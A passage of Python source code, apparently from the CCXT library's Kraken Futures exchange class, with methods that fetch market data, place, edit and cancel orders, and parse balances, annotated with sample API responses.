self.currencies = self.deep_extend(currencies, self.currencies)
return result
async def fetch_order_book(self, symbol: str, limit: Optional[int] = None, params={}):
"""
Fetches a list of open orders in a market
:param str symbol: Unified market symbol
:param int|None limit: Not used by krakenfutures
:param dict params: exchange specific params
:returns: An `order book structure <https://docs.ccxt.com/#/?id=order-book-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = await self.publicGetOrderbook(self.extend(request, params))
#
# {
# "result": "success",
# "serverTime": "2016-02-25T09:45:53.818Z",
# "orderBook": {
# "bids": [
# [
# 4213,
# 2000,
# ],
# [
# 4210,
# 4000,
# ],
# ...
# ],
# "asks": [
# [
# 4218,
# 4000,
# ],
# [
# 4220,
# 5000,
# ],
# ...
# ],
# },
# }
#
timestamp = self.parse8601(response['serverTime'])
return self.parse_order_book(response['orderBook'], symbol, timestamp)
async def fetch_tickers(self, symbols: Optional[List[str]] = None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
#
# {
# result: 'success',
# tickers: [
# {
# tag: 'semiannual', # 'month', 'quarter', 'perpetual', 'semiannual',
# pair: 'ETH:USD',
# symbol: 'fi_ethusd_220624',
# markPrice: '2925.72',
# bid: '2923.8',
# bidSize: '16804',
# ask: '2928.65',
# askSize: '1339',
# vol24h: '860493',
# openInterest: '3023363.00000000',
# open24h: '3021.25',
# indexPrice: '2893.71',
# last: '2942.25',
# lastTime: '2022-02-18T14:08:15.578Z',
# lastSize: '151',
# suspended: False
# },
# {
# symbol: 'in_xbtusd', # 'rr_xbtusd',
# last: '40411',
# lastTime: '2022-02-18T14:16:28.000Z'
# },
# ...
# ],
# serverTime: '2022-02-18T14:16:29.440Z'
# }
#
tickers = self.safe_value(response, 'tickers')
return self.parse_tickers(tickers, symbols)
def parse_ticker(self, ticker, market=None):
#
# {
# tag: 'semiannual', # 'month', 'quarter', 'perpetual', 'semiannual',
# pair: 'ETH:USD',
# symbol: 'fi_ethusd_220624',
# markPrice: '2925.72',
# bid: '2923.8',
# bidSize: '16804',
# ask: '2928.65',
# askSize: '1339',
# vol24h: '860493',
# openInterest: '3023363.00000000',
# open24h: '3021.25',
# indexPrice: '2893.71',
# last: '2942.25',
# lastTime: '2022-02-18T14:08:15.578Z',
# lastSize: '151',
# suspended: False
# }
#
# {
# symbol: 'in_xbtusd', # 'rr_xbtusd',
# last: '40411',
# lastTime: '2022-02-18T14:16:28.000Z'
# }
#
marketId = self.safe_string(ticker, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
timestamp = self.parse8601(self.safe_string(ticker, 'lastTime'))
open = self.safe_string(ticker, 'open24h')
last = self.safe_string(ticker, 'last')
change = Precise.string_sub(last, open)
percentage = Precise.string_mul(Precise.string_div(change, open), '100')
average = Precise.string_div(Precise.string_add(open, last), '2')
volume = self.safe_string(ticker, 'vol24h')
baseVolume = None
quoteVolume = None
isIndex = self.safe_value(market, 'index', False)
if not isIndex:
if market['linear']:
baseVolume = volume
elif market['inverse']:
quoteVolume = volume
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_string(ticker, 'bid'),
'bidVolume': self.safe_string(ticker, 'bidSize'),
'ask': self.safe_string(ticker, 'ask'),
'askVolume': self.safe_string(ticker, 'askSize'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
})
async def fetch_ohlcv(self, symbol: str, timeframe='1m', since: Optional[int] = None, limit: Optional[int] = None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
'price_type': self.safe_string(params, 'price', 'trade'),
'interval': self.timeframes[timeframe],
}
params = self.omit(params, 'price')
if since is not None:
duration = self.parse_timeframe(timeframe)
request['from'] = self.parse_to_int(since / 1000)
if limit is None:
limit = 5000
elif limit > 5000:
raise BadRequest(self.id + ' fetchOHLCV() limit cannot exceed 5000')
toTimestamp = self.sum(request['from'], limit * duration - 1)
currentTimestamp = self.seconds()
request['to'] = min(toTimestamp, currentTimestamp)
elif limit is not None:
if limit > 5000:
raise BadRequest(self.id + ' fetchOHLCV() limit cannot exceed 5000')
duration = self.parse_timeframe(timeframe)
request['to'] = self.seconds()
request['from'] = self.parse_to_int(request['to'] - (duration * limit))
response = await self.chartsGetPriceTypeSymbolInterval(self.extend(request, params))
#
# {
# "candles": [
# {
# "time": 1645198500000,
# "open": "309.15000000000",
# "high": "309.15000000000",
# "low": "308.70000000000",
# "close": "308.85000000000",
# "volume": 0
# }
# ],
# "more_candles": True
# }
#
candles = self.safe_value(response, 'candles')
return self.parse_ohlcvs(candles, market, timeframe, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "time": 1645198500000,
# "open": "309.15000000000",
# "high": "309.15000000000",
# "low": "308.70000000000",
# "close": "308.85000000000",
# "volume": 0
# }
#
return [
self.safe_integer(ohlcv, 'time'), # unix timestamp in milliseconds
self.safe_number(ohlcv, 'open'), # open price
self.safe_number(ohlcv, 'high'), # highest price
self.safe_number(ohlcv, 'low'), # lowest price
self.safe_number(ohlcv, 'close'), # close price
self.safe_number(ohlcv, 'volume'), # trading volume, None for mark or index price
]
async def fetch_trades(self, symbol: str, since: Optional[int] = None, limit: Optional[int] = None, params={}):
"""
* @descriptions Fetch a history of filled trades that self account has made
:param str symbol: Unified CCXT market symbol
:param int|None since: Timestamp in ms of earliest trade. Not used by krakenfutures except in combination with params.until
:param int|None limit: Total number of trades, cannot exceed 100
:param dict params: Exchange specific params
:param int|None params['until']: Timestamp in ms of latest trade
:returns: An array of `trade structures <https://docs.ccxt.com/#/?id=trade-structure>`
"""
await self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
until = self.safe_integer(params, 'until')
if until is not None:
request['lastTime'] = self.iso8601(until)
#
# {
# "result": "success",
# "history": [
# {
# "time": "2022-03-18T04:55:37.692Z",
# "trade_id": 100,
# "price": 0.7921,
# "size": 1068,
# "side": "sell",
# "type": "fill",
# "uid": "6c5da0b0-f1a8-483f-921f-466eb0388265"
# },
# ...
# ],
# "serverTime": "2022-03-18T06:39:18.056Z"
# }
#
response = await self.publicGetHistory(self.extend(request, params))
history = self.safe_value(response, 'history')
return self.parse_trades(history, market, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "time": "2019-02-14T09:25:33.920Z",
# "trade_id": 100,
# "price": 3574,
# "size": 100,
# "side": "buy",
# "type": "fill" # fill, liquidation, assignment, termination
# "uid": "11c3d82c-9e70-4fe9-8115-f643f1b162d4"
# }
#
# fetchMyTrades(private)
#
# {
# "fillTime": "2016-02-25T09:47:01.000Z",
# "order_id": "c18f0c17-9971-40e6-8e5b-10df05d422f0",
# "fill_id": "522d4e08-96e7-4b44-9694-bfaea8fe215e",
# "cliOrdId": "d427f920-ec55-4c18-ba95-5fe241513b30", # OPTIONAL
# "symbol": "fi_xbtusd_180615",
# "side": "buy",
# "size": 2000,
# "price": 4255,
# "fillType": "maker" # taker, takerAfterEdit, maker, liquidation, assignee
# }
#
# execution report(createOrder, editOrder)
#
# {
# "executionId": "e1ec9f63-2338-4c44-b40a-43486c6732d7",
# "price": 7244.5,
# "amount": 10,
# "orderPriorEdit": null,
# "orderPriorExecution": {
# "orderId": "61ca5732-3478-42fe-8362-abbfd9465294",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10,
# "filled": 0,
# "limitPrice": 7500,
# "reduceOnly": False,
# "timestamp": "2019-12-11T17:17:33.888Z",
# "lastUpdateTimestamp": "2019-12-11T17:17:33.888Z"
# },
# "takerReducedQuantity": null,
# "type": "EXECUTION"
# }
#
timestamp = self.parse8601(self.safe_string_2(trade, 'time', 'fillTime'))
price = self.safe_string(trade, 'price')
amount = self.safe_string_2(trade, 'size', 'amount', '0.0')
id = self.safe_string_2(trade, 'uid', 'fill_id')
if id is None:
id = self.safe_string(trade, 'executionId')
order = self.safe_string(trade, 'order_id')
symbolId = self.safe_string(trade, 'symbol')
side = self.safe_string(trade, 'side')
type = None
priorEdit = self.safe_value(trade, 'orderPriorEdit')
priorExecution = self.safe_value(trade, 'orderPriorExecution')
if priorExecution is not None:
order = self.safe_string(priorExecution, 'orderId')
symbolId = self.safe_string(priorExecution, 'symbol')
side = self.safe_string(priorExecution, 'side')
type = self.safe_string(priorExecution, 'type')
elif priorEdit is not None:
order = self.safe_string(priorEdit, 'orderId')
symbolId = self.safe_string(priorEdit, 'symbol')
side = self.safe_string(priorEdit, 'type')
type = self.safe_string(priorEdit, 'type')
if type is not None:
type = self.parse_order_type(type)
symbol = None
if symbolId is not None:
market = self.safe_value(self.markets_by_id, symbolId)
if market is None:
symbol = symbolId
symbol = self.safe_string(market, 'symbol', symbol)
cost = None
if (amount is not None) and (price is not None) and (market is not None):
linear = self.safe_value(market, 'linear')
if linear:
cost = Precise.string_mul(amount, price) # in quote
else:
cost = Precise.string_div(amount, price) # in base
contractSize = self.safe_string(market, 'contractSize')
cost = Precise.string_mul(cost, contractSize)
takerOrMaker = None
fillType = self.safe_string(trade, 'fillType')
if fillType is not None:
if fillType.find('taker') >= 0:
takerOrMaker = 'taker'
elif fillType.find('maker') >= 0:
takerOrMaker = 'maker'
return self.safe_trade({
'info': trade,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': order,
'type': type,
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
})
async def create_order(self, symbol: str, type, side: OrderSide, amount, price=None, params={}):
"""
Create an order on the exchange
:param str symbol: market symbol
:param str type: One of 'limit', 'market', 'take_profit'
:param str side: buy or sell
:param int amount: Contract quantity
:param float price: Limit order price
:param float|None params['stopPrice']: The stop price associated with a stop or take profit order, Required if orderType is stp or take_profit, Must not have more than 2 decimal places, Note that for stop orders, limitPrice denotes the worst price at which the stop or take_profit order can get filled at. If no limitPrice is provided the stop or take_profit order will trigger a market order,
:param bool|None params['reduceOnly']: Set if you wish the order to only reduce an existing position, Any order which increases an existing position will be rejected, Default False,
:param bool|None params['postOnly']: Set if you wish to make a postOnly order, Default False
:param str|None params['triggerSignal']: If placing a stp or take_profit, the signal used for trigger, One of: 'mark', 'index', 'last', last is market price
:param str|None params['cliOrdId']: UUID The order identity that is specified from the user, It must be globally unique
:param str|None params['clientOrderId']: UUID The order identity that is specified from the user, It must be globally unique
"""
await self.load_markets()
type = self.safe_string(params, 'orderType', type)
timeInForce = self.safe_string(params, 'timeInForce')
stopPrice = self.safe_string(params, 'stopPrice')
postOnly = False
postOnly, params = self.handle_post_only(type == 'market', type == 'post', params)
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'cliOrdId')
params = self.omit(params, ['clientOrderId', 'cliOrdId'])
if (type == 'stp' or type == 'take_profit') and stopPrice is None:
raise ArgumentsRequired(self.id + ' createOrder requires params.stopPrice when type is ' + type)
if stopPrice is not None and type != 'take_profit':
type = 'stp'
elif postOnly:
type = 'post'
elif timeInForce == 'ioc':
type = 'ioc'
elif type == 'limit':
type = 'lmt'
elif type == 'market':
type = 'mkt'
request = {
'orderType': type,
'symbol': self.market_id(symbol),
'side': side,
'size': amount,
}
if price is not None:
request['limitPrice'] = price
if clientOrderId is not None:
request['cliOrdId'] = clientOrderId
response = await self.privatePostSendorder(self.extend(request, params))
#
# {
# "result": "success",
# "sendStatus": {
# "order_id": "salf320-e337-47ac-b345-30sdfsalj",
# "status": "placed",
# "receivedTime": "2022-02-28T19:32:17.122Z",
# "orderEvents": [
# {
# "order": {
# "orderId": "salf320-e337-47ac-b345-30sdfsalj",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xrpusd",
# "side": "buy",
# "quantity": 1,
# "filled": 0,
# "limitPrice": 0.7,
# "reduceOnly": False,
# "timestamp": "2022-02-28T19:32:17.122Z",
# "lastUpdateTimestamp": "2022-02-28T19:32:17.122Z"
# },
# "reducedQuantity": null,
# "type": "PLACE"
# }
# ]
# },
# "serverTime": "2022-02-28T19:32:17.122Z"
# }
#
sendStatus = self.safe_value(response, 'sendStatus')
status = self.safe_string(sendStatus, 'status')
self.verify_order_action_success(status, 'createOrder', ['filled'])
return self.parse_order(sendStatus)
async def edit_order(self, id: str, symbol, type, side, amount=None, price=None, params={}):
"""
Edit an open order on the exchange
:param str id: order id
:param str symbol: Not used by Krakenfutures
:param str type: Not used by Krakenfutures
:param str side: Not used by Krakenfutures
:param float|None amount: Order size
:param float|None price: Price to fill order at
:param dict params: Exchange specific params
:returns: An `order structure <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
request = {
'orderId': id,
}
if amount is not None:
request['size'] = amount
if price is not None:
request['limitPrice'] = price
response = await self.privatePostEditorder(self.extend(request, params))
status = self.safe_string(response['editStatus'], 'status')
self.verify_order_action_success(status, 'editOrder', ['filled'])
order = self.parse_order(response['editStatus'])
return self.extend({'info': response}, order)
async def cancel_order(self, id: str, symbol: Optional[str] = None, params={}):
"""
:param str id: Order id
:param str|None symbol: Not used by Krakenfutures
:param dict params: Exchange specific params
:returns: An `order structure <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
response = await self.privatePostCancelorder(self.extend({'order_id': id}, params))
status = self.safe_string(self.safe_value(response, 'cancelStatus', {}), 'status')
self.verify_order_action_success(status, 'cancelOrder')
order = {}
if 'cancelStatus' in response:
order = self.parse_order(response['cancelStatus'])
return self.extend({'info': response}, order)
async def cancel_all_orders(self, symbol: Optional[str] = None, params={}):
"""
Cancels all orders on the exchange, including trigger orders
:param str symbol: Unified market symbol
:param dict params: Exchange specific params
:returns: Response from exchange api
"""
request = {}
if symbol is not None:
request['symbol'] = self.market_id(symbol)
response = await self.privatePostCancelallorders(self.extend(request, params))
return response
async def fetch_open_orders(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
"""
Gets all open orders, including trigger orders, for an account from the exchange api
:param str symbol: Unified market symbol
:param int since: Timestamp(ms) of earliest order.(Not used by kraken api but filtered internally by CCXT)
:param int limit: How many orders to return.(Not used by kraken api but filtered internally by CCXT)
:param dict params: Exchange specific parameters
:returns: An array of `order structures <https://docs.ccxt.com/#/?id=order-structure>`
"""
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
response = await self.privateGetOpenorders(params)
orders = self.safe_value(response, 'openOrders', [])
return self.parse_orders(orders, market, since, limit)
def parse_order_type(self, orderType):
map = {
'lmt': 'limit',
'mkt': 'market',
'post': 'limit',
'ioc': 'market',
}
return self.safe_string(map, orderType, orderType)
def verify_order_action_success(self, status, method, omit=[]):
errors = {
'invalidOrderType': InvalidOrder,
'invalidSide': InvalidOrder,
'invalidSize': InvalidOrder,
'invalidPrice': InvalidOrder,
'insufficientAvailableFunds': InsufficientFunds,
'selfFill': ExchangeError,
'tooManySmallOrders': ExchangeError,
'maxPositionViolation': BadRequest,
'marketSuspended': ExchangeNotAvailable,
'marketInactive': ExchangeNotAvailable,
'clientOrderIdAlreadyExist': DuplicateOrderId,
'clientOrderIdTooLong': BadRequest,
'outsidePriceCollar': InvalidOrder,
'postWouldExecute': OrderImmediatelyFillable, # the unplaced order could actually be parsed(with status = "rejected"), but there is self specific error for self
'iocWouldNotExecute': OrderNotFillable, # -||-
'wouldNotReducePosition': ExchangeError,
'orderForEditNotFound': OrderNotFound,
'orderForEditNotAStop': InvalidOrder,
'filled': OrderNotFound,
'notFound': OrderNotFound,
}
if (status in errors) and not self.in_array(status, omit):
raise errors[status](self.id + ': ' + method + ' failed due to ' + status)
def parse_order_status(self, status):
statuses = {
'placed': 'open', # the order was placed successfully
'cancelled': 'canceled', # the order was cancelled successfully
'invalidOrderType': 'rejected', # the order was not placed because orderType is invalid
'invalidSide': 'rejected', # the order was not placed because side is invalid
'invalidSize': 'rejected', # the order was not placed because size is invalid
'invalidPrice': 'rejected', # the order was not placed because limitPrice and/or stopPrice are invalid
'insufficientAvailableFunds': 'rejected', # the order was not placed because available funds are insufficient
'selfFill': 'rejected', # the order was not placed because it would be filled against an existing order belonging to the same account
'tooManySmallOrders': 'rejected', # the order was not placed because the number of small open orders would exceed the permissible limit
'maxPositionViolation': 'rejected', # Order would cause you to exceed your maximum position in self contract.
'marketSuspended': 'rejected', # the order was not placed because the market is suspended
'marketInactive': 'rejected', # the order was not placed because the market is inactive
'clientOrderIdAlreadyExist': 'rejected', # the specified client id already exist
'clientOrderIdTooLong': 'rejected', # the client id is longer than the permissible limit
'outsidePriceCollar': 'rejected', # the limit order crosses the spread but is an order of magnitude away from the mark price - fat finger control
# Should the next two be 'expired' ?
'postWouldExecute': 'rejected', # the post-only order would be filled upon placement, thus is cancelled
'iocWouldNotExecute': 'rejected', # the immediate-or-cancel order would not execute.
'wouldNotReducePosition': 'rejected', # the reduce only order would not reduce position.
'edited': 'open', # the order was edited successfully
'orderForEditNotFound': 'rejected', # the requested order for edit has not been found
'orderForEditNotAStop': 'rejected', # the supplied stopPrice cannot be applied because order is not a stop order
'filled': 'closed', # the order was found completely filled and could not be cancelled
'notFound': 'rejected', # the order was not found, either because it had already been cancelled or it never existed
'untouched': 'open', # the entire size of the order is unfilled
'partiallyFilled': 'open', # the size of the order is partially but not entirely filled
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# LIMIT
#
# {
# "order_id": "179f9af8-e45e-469d-b3e9-2fd4675cb7d0",
# "status": "placed",
# "receivedTime": "2019-09-05T16:33:50.734Z",
# "orderEvents": [
# {
# "uid": "614a5298-0071-450f-83c6-0617ce8c6bc4",
# "order": {
# "orderId": "179f9af8-e45e-469d-b3e9-2fd4675cb7d0",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10000,
# "filled": 0,
# "limitPrice": 9400,
# "reduceOnly": False,
# "timestamp": "2019-09-05T16:33:50.734Z",
# "lastUpdateTimestamp": "2019-09-05T16:33:50.734Z"
# },
# "reducedQuantity": null,
# "reason": "WOULD_NOT_REDUCE_POSITION", # REJECTED
# "type": "PLACE"
# }
# ]
# }
#
# CONDITIONAL
#
# {
# "order_id": "1abfd3c6-af93-4b30-91cc-e4a93797f3f5",
# "status": "placed",
# "receivedTime": "2019-12-05T10:20:50.701Z",
# "orderEvents": [
# {
# "orderTrigger": {
# "uid": "1abfd3c6-af93-4b30-91cc-e4a93797f3f5",
# "clientId":null,
# "type": "lmt", # "ioc" if stop market
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity":10,
# "limitPrice":15000,
# "triggerPrice":9500,
# "triggerSide": "trigger_below",
# "triggerSignal": "mark_price",
# "reduceOnly":false,
# "timestamp": "2019-12-05T10:20:50.701Z",
# "lastUpdateTimestamp": "2019-12-05T10:20:50.701Z"
# },
# "type": "PLACE"
# }
# ]
# }
#
# EXECUTION
#
# {
# "order_id": "61ca5732-3478-42fe-8362-abbfd9465294",
# "status": "placed",
# "receivedTime": "2019-12-11T17:17:33.888Z",
# "orderEvents": [
# {
# "executionId": "e1ec9f63-2338-4c44-b40a-43486c6732d7",
# "price": 7244.5,
# "amount": 10,
# "orderPriorEdit": null,
# "orderPriorExecution": {
# "orderId": "61ca5732-3478-42fe-8362-abbfd9465294",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10,
# "filled": 0,
# "limitPrice": 7500,
# "reduceOnly": False,
# "timestamp": "2019-12-11T17:17:33.888Z",
# "lastUpdateTimestamp": "2019-12-11T17:17:33.888Z"
# },
# "takerReducedQuantity": null,
# "type": "EXECUTION"
# }
# ]
# }
#
# EDIT ORDER
#
# {
# "status": "edited",
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "receivedTime": "2019-09-05T16:47:47.521Z",
# "orderEvents": [
# {
# "old": {
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "cliOrdId":null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity":1000,
# "filled":0,
# "limitPrice":9400.0,
# "reduceOnly":false,
# "timestamp": "2019-09-05T16:41:35.173Z",
# "lastUpdateTimestamp": "2019-09-05T16:41:35.173Z"
# },
# "new": {
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 1501,
# "filled": 0,
# "limitPrice": 7200,
# "reduceOnly": False,
# "timestamp": "2019-09-05T16:41:35.173Z",
# "lastUpdateTimestamp": "2019-09-05T16:47:47.519Z"
# },
# "reducedQuantity": null,
# "type": "EDIT"
# }
# ]
# }
#
# CANCEL ORDER
#
# {
# "status": "cancelled",
# "orderEvents": [
# {
# "uid": "85c40002-3f20-4e87-9302-262626c3531b",
# "order": {
# "orderId": "85c40002-3f20-4e87-9302-262626c3531b",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 1000,
# "filled": 0,
# "limitPrice": 10144,
# "stopPrice": null,
# "reduceOnly": False,
# "timestamp": "2019-08-01T15:26:27.790Z"
# },
# "type": "CANCEL"
# }
# ]
# }
#
# FETCH OPEN ORDERS
#
# {
# "order_id": "59302619-41d2-4f0b-941f-7e7914760ad3",
# "symbol": "pi_xbtusd",
# "side": "sell",
# "orderType": "lmt",
# "limitPrice": 10640,
# "unfilledSize": 304,
# "receivedTime": "2019-09-05T17:01:17.410Z",
# "status": "untouched",
# "filledSize": 0,
# "reduceOnly": True,
# "lastUpdateTime": "2019-09-05T17:01:17.410Z"
# }
#
orderEvents = self.safe_value(order, 'orderEvents', [])
details = None
isPrior = False
fixed = False
statusId = None
price = None
trades = []
if len(orderEvents) > 0:
executions = []
for i in range(0, len(orderEvents)):
item = orderEvents[i]
if self.safe_string(item, 'type') == 'EXECUTION':
executions.append(item)
# Final order(after placement / editing / execution / canceling)
orderTrigger = self.safe_value(item, 'orderTrigger')
details = self.safe_value_2(item, 'new', 'order', orderTrigger)
if details is not None:
isPrior = False
fixed = True
elif not fixed:
orderPriorExecution = self.safe_value(item, 'orderPriorExecution')
details = self.safe_value_2(item, 'orderPriorExecution', 'orderPriorEdit')
price = self.safe_string(orderPriorExecution, 'limitPrice')
if details is not None:
isPrior = True
trades = self.parse_trades(executions)
statusId = self.safe_string(order, 'status')
if details is None:
details = order
if statusId is None:
statusId = self.safe_string(details, 'status')
# This may be incorrectly marked as "open" if only execution report is given,
# but will be fixed below
status = self.parse_order_status(statusId)
isClosed = self.in_array(status, ['canceled', 'rejected', 'closed'])
marketId = self.safe_string(details, 'symbol')
market = self.safe_market(marketId, market)
timestamp = self.parse8601(self.safe_string_2(details, 'timestamp', 'receivedTime'))
if price is None:
price = self.safe_string(details, 'limitPrice')
amount = self.safe_string(details, 'quantity')
filled = self.safe_string_2(details, 'filledSize', 'filled', '0.0')
remaining = self.safe_string(details, 'unfilledSize')
average = None
filled2 = '0.0'
if len(trades) > 0:
vwapSum = '0.0'
for i in range(0, len(trades)):
trade = trades[i]
tradeAmount = self.safe_string(trade, 'amount')
tradePrice = self.safe_string(trade, 'price')
filled2 = Precise.string_add(filled2, tradeAmount)
vwapSum = Precise.string_add(vwapSum, Precise.string_mul(tradeAmount, tradePrice))
average = Precise.string_div(vwapSum, filled2)
if (amount is not None) and (not isClosed) and isPrior and Precise.string_ge(filled2, amount):
status = 'closed'
isClosed = True
if isPrior:
filled = Precise.string_add(filled, filled2)
else:
filled = Precise.string_max(filled, filled2)
if remaining is None:
if isPrior:
if amount is not None:
# remaining amount before execution minus executed amount
remaining = Precise.string_sub(amount, filled2)
else:
remaining = amount
# if fetchOpenOrders are parsed
if (amount is None) and (not isPrior) and (remaining is not None):
amount = Precise.string_add(filled, remaining)
cost = None
if (filled is not None) and (market is not None):
whichPrice = average if (average is not None) else price
if whichPrice is not None:
if market['linear']:
cost = Precise.string_mul(filled, whichPrice) # in quote
else:
cost = Precise.string_div(filled, whichPrice) # in base
id = self.safe_string_2(order, 'order_id', 'orderId')
if id is None:
id = self.safe_string_2(details, 'orderId', 'uid')
type = self.safe_string_lower_2(details, 'type', 'orderType')
timeInForce = 'gtc'
if type == 'ioc' or self.parse_order_type(type) == 'market':
timeInForce = 'ioc'
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': self.safe_string_2(details, 'clientOrderId', 'clientId'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': self.safe_string(market, 'symbol'),
'type': self.parse_order_type(type),
'timeInForce': timeInForce,
'postOnly': type == 'post',
'side': self.safe_string(details, 'side'),
'price': price,
'stopPrice': self.safe_string(details, 'triggerPrice'),
'triggerPrice': self.safe_string(details, 'triggerPrice'),
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
'fees': None,
'trades': trades,
})
async def fetch_my_trades(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
response = await self.privateGetFills(params)
#
# {
# "result": "success",
# "serverTime": "2016-02-25T09:45:53.818Z",
# "fills": [
# {
# "fillTime": "2016-02-25T09:47:01.000Z",
# "order_id": "c18f0c17-9971-40e6-8e5b-10df05d422f0",
# "fill_id": "522d4e08-96e7-4b44-9694-bfaea8fe215e",
# "cliOrdId": "d427f920-ec55-4c18-ba95-5fe241513b30", # EXTRA
# "symbol": "fi_xbtusd_180615",
# "side": "buy",
# "size": 2000,
# "price": 4255,
# "fillType": "maker"
# },
# ...
# ]
# }
#
return self.parse_trades(response['fills'], market, since, limit)
async def fetch_balance(self, params={}):
"""
Fetch the balance for a sub-account, all sub-account balances are inside 'info' in the response
:param dict params: Exchange specific parameters
:param str params['type']: The sub-account type to query the balance of, possible values include 'flex', 'cash'/'main'/'funding', or a market symbol * defaults to 'cash' *
:param str params['symbol']: A unified market symbol, when assigned the balance for a trading market that matches the symbol is returned
:returns: A `balance structure <https://docs.ccxt.com/#/?id=balance-structure>`
"""
await self.load_markets()
type = self.safe_string_2(params, 'type', 'account')
symbol = self.safe_string(params, 'symbol')
params = self.omit(params, ['type', 'account', 'symbol'])
response = await self.privateGetAccounts(params)
#
# {
# result: 'success',
# accounts: {
# fi_xbtusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xbt: '0.0'},
# currency: 'xbt',
# type: 'marginAccount'
# },
# cash: {
# balances: {
# eur: '0.0',
# gbp: '0.0',
# bch: '0.0',
# xrp: '2.20188538338',
# usd: '0.0',
# eth: '0.0',
# usdt: '0.0',
# ltc: '0.0',
# usdc: '0.0',
# xbt: '0.0'
# },
# type: 'cashAccount'
# },
# fv_xrpxbt: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xbt: '0.0'},
# currency: 'xbt',
# type: 'marginAccount'
# },
# fi_xrpusd: {
# auxiliary: {usd: '0', pv: '11.0', pnl: '0.0', af: '11.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xrp: '11.0'},
# currency: 'xrp',
# type: 'marginAccount'
# },
# fi_ethusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {eth: '0.0'},
# currency: 'eth',
# type: 'marginAccount'
# },
# fi_ltcusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {ltc: '0.0'},
# currency: 'ltc',
# type: 'marginAccount'
# },
# fi_bchusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {bch: '0.0'},
# currency: 'bch',
# type: 'marginAccount'
# },
# flex: {
# currencies: {},
# initialMargin: '0.0',
# initialMarginWithOrders: '0.0',
# maintenanceMargin: '0.0',
# balanceValue: '0.0',
# portfolioValue: '0.0',
# collateralValue: '0.0',
# pnl: '0.0',
# unrealizedFunding: '0.0',
# totalUnrealized: '0.0',
# totalUnrealizedAsMargin: '0.0',
# availableMargin: '0.0',
# marginEquity: '0.0',
# type: 'multiCollateralMarginAccount'
# }
# },
# serverTime: '2022-04-12T07:48:07.475Z'
# }
#
datetime = self.safe_string(response, 'serverTime')
if type == 'marginAccount' or type == 'margin':
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchBalance requires symbol argument for margin accounts')
type = symbol
if type is None:
type = 'cash' if (symbol is None) else symbol
accountName = self.parse_account(type)
accounts = self.safe_value(response, 'accounts')
account = self.safe_value(accounts, accountName)
if account is None:
type = '' if (type is None) else type
